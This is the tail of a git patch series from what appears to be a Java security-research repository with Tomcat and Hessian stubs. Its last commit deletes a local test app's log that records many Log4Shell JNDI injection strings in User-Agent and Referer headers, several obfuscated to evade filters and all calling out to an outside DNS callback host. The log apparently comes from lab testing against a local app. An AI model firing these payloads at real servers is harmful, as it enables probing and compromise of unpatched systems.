b/MiddleWare/Tomcat/.idea/vcs.xml new file mode 100644 index 0000000..d843f34 --- /dev/null +++ b/MiddleWare/Tomcat/.idea/vcs.xml @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/MiddleWare/Tomcat/pom.xml b/MiddleWare/Tomcat/pom.xml new file mode 100644 index 0000000..31f8c91 --- /dev/null +++ b/MiddleWare/Tomcat/pom.xml @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + Tomcat + war + 1.0-SNAPSHOT + Tomcat Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + Tomcat + + diff --git a/MiddleWare/Tomcat/src/main/java/com/test/servlet.java b/MiddleWare/Tomcat/src/main/java/com/test/servlet.java new file mode 100644 index 0000000..9f2d3c0 --- /dev/null +++ b/MiddleWare/Tomcat/src/main/java/com/test/servlet.java @@ -0,0 +1,4 @@ +package com.test; + +public class servlet { +} diff --git a/MiddleWare/Tomcat/src/main/java/com/test/tmp.java b/MiddleWare/Tomcat/src/main/java/com/test/tmp.java new file mode 100644 index 0000000..00a8f3c --- /dev/null +++ b/MiddleWare/Tomcat/src/main/java/com/test/tmp.java @@ -0,0 +1,4 @@ +package com.test; + +public class tmp { +} 
diff --git a/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml b/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ b/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git a/MiddleWare/Tomcat/src/main/webapp/index.jsp b/MiddleWare/Tomcat/src/main/webapp/index.jsp new file mode 100644 index 0000000..cc264d7 --- /dev/null +++ b/MiddleWare/Tomcat/src/main/webapp/index.jsp @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/11/29 + Time: 10:27 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git a/hessian/src/main/java/com/test/gadget/c3p0.java b/hessian/src/main/java/com/test/gadget/c3p0.java new file mode 100644 index 0000000..6042d8f --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/c3p0.java @@ -0,0 +1,4 @@ +package com.test.gadget; + +public class c3p0 { +} From 2798e64b44afeb9de16fc6a5d12c0002cdccaeda Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Mon, 8 Dec 2025 15:04:59 +0800 Subject: [PATCH 16/16] update --- JNDI/Log4j2/logs/app.log | 125 --------------------------------------- README.md | 14 +++-- 2 files changed, 9 insertions(+), 130 deletions(-) delete mode 100644 JNDI/Log4j2/logs/app.log diff --git a/JNDI/Log4j2/logs/app.log b/JNDI/Log4j2/logs/app.log deleted file mode 100644 index 5bab32d..0000000 --- a/JNDI/Log4j2/logs/app.log +++ /dev/null 
@@ -1,125 +0,0 @@ -2025-12-08 14:03:20 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:03:20 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:03:20 ERROR com.example.spring.controller.IndexController - Hello, World -2025-12-08 14:03:26 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:03:26 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dUq1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/ user -2025-12-08 14:03:27 ERROR com.example.spring.controller.IndexController - Hello, World -2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:03:50 ERROR com.example.spring.controller.IndexController - Hello, 123 -2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dWfi%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:03:50 ERROR com.example.spring.controller.IndexController - Hello, ${jndi:dns://0${::-.}get${::-.}127${::-.}0${::-.}0${::-.}1${::-.}8005${::-.}Wfi${::-.}hpdth2${::-.}ceye${::-.}io/ user} -2025-12-08 14:05:06 INFO 
com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:05:06 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:05:06 ERROR com.example.spring.controller.IndexController - Hello, World -2025-12-08 14:06:35 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:06:35 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7b::-n%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dTOn%24%7b::-.%7d2%24%7b::-.%7d1%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dTVK%24%7b::-.%7d2%24%7b::-.%7d0%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/132.0.0.0 Safari/537.36n%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dTOn$%7b::-.%7d3$%7b::-.%7d1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dTVK$%7b::-.%7d3$%7b::-.%7d0$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:11:28 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:11:28 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:11:34 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:11:34 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:11:48 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:11:48 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:13:12 ERROR com.example.spring.controller.IndexController - Referer: 127 -2025-12-08 14:13:12 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:13:30 ERROR com.example.spring.controller.IndexController - Referer: 127 -2025-12-08 14:13:30 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:21:27 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:21:27 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:21:33 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:21:33 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.dzu3.hpdth2.ceye.io/user} -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.ldY20.hpdth2.ceye.io/user} -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.YGL21.hpdth2.ceye.io/user} -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.ldY30.hpdth2.ceye.io/user} -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 
Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.YGL31.hpdth2.ceye.io/user} -2025-12-08 14:27:10 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:10 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7deCv%24%7b::-.%7d2%24%7b::-.%7d0%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jn%24%7benv::-%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dSmj%24%7b::-.%7d2%24%7b::-.%7d2%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 
Safari/537.36n%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dMZw$%7b::-.%7d3$%7b::-.%7d1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7b::-n%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dMZw%24%7b::-.%7d2%24%7b::-.%7d1%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dSmj$%7b::-.%7d3$%7b::-.%7d2$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7bsys:k5:-nD%7d%24%7blower:i%24%7bweb:k5:-:%7d%7ddns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7d98G%24%7b::-.%7d2%24%7b::-.%7d3%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 
Safari/537.36nD%7d$%7blower:i$%7bweb:k5:-:%7d%7ddns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7d98G$%7b::-.%7d3$%7b::-.%7d3$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{%24{%24{::-j}%24{::-n}%24{::-d}%24{::-i}:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dMds%24%7b::-.%7d2%24%7b::-.%7d4%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${${${::-j}${::-n}${::-d}${::-i}:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dMds$%7b::-.%7d3$%7b::-.%7d4$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7deCv$%7b::-.%7d3$%7b::-.%7d0$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 
Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.2Wf20.hpdth2.ceye.io/%20user} -2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.2Wf30.hpdth2.ceye.io/%20user} -2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.Ue320.hpdth2.ceye.io/%20user} -2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.Ue330.hpdth2.ceye.io/%20user} -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.Q0a21.hpdth2.ceye.io/ user} -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.49C20.hpdth2.ceye.io/ user} -2025-12-08 14:30:19 ERROR 
com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.49C30.hpdth2.ceye.io/ user} -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.Q0a31.hpdth2.ceye.io/ user} -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.T3s21.hpdth2.ceye.io/ user} -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.De620.hpdth2.ceye.io/ user} -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.De630.hpdth2.ceye.io/ user} -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.T3s31.hpdth2.ceye.io/ user} -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: 
null -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.cKd20.hpdth2.ceye.io/ user} -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.ShD21.hpdth2.ceye.io/ user} -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.cKd30.hpdth2.ceye.io/ user} -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.ShD31.hpdth2.ceye.io/ user} -2025-12-08 14:32:58 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:32:58 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:33:04 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:04 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.r8P3.hpdth2.ceye.io/ user} -2025-12-08 14:33:53 ERROR 
com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://2.get.127.0.0.1.8005.OPY20.hpdth2.ceye.io/ user} -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://2.get.127.0.0.1.8005.ewP21.hpdth2.ceye.io/ user} -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://2.get.127.0.0.1.8005.OPY30.hpdth2.ceye.io/ user} -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://2.get.127.0.0.1.8005.ewP31.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :%24{jndi:dns://2.get.127.0.0.1.8005.81P20.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :%24{j%24{::-n}di:dns://2.get.127.0.0.1.8005.apc21.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.81P20.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR 
com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.apc21.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :${jndi:dns://2.get.127.0.0.1.8005.81P30.hpdth2.ceye.io/ user} -2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :${j${::-n}di:dns://2.get.127.0.0.1.8005.apc31.hpdth2.ceye.io/ user} -2025-12-08 14:34:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.81P30.hpdth2.ceye.io/ user} -2025-12-08 14:34:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.apc31.hpdth2.ceye.io/ user} -2025-12-08 14:35:36 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:35:36 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:35:42 ERROR com.example.spring.controller.IndexController - Referer: :${jndi:dns://2.get.127.0.0.1.8005.1rk3.hpdth2.ceye.io/ user} -2025-12-08 14:35:43 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 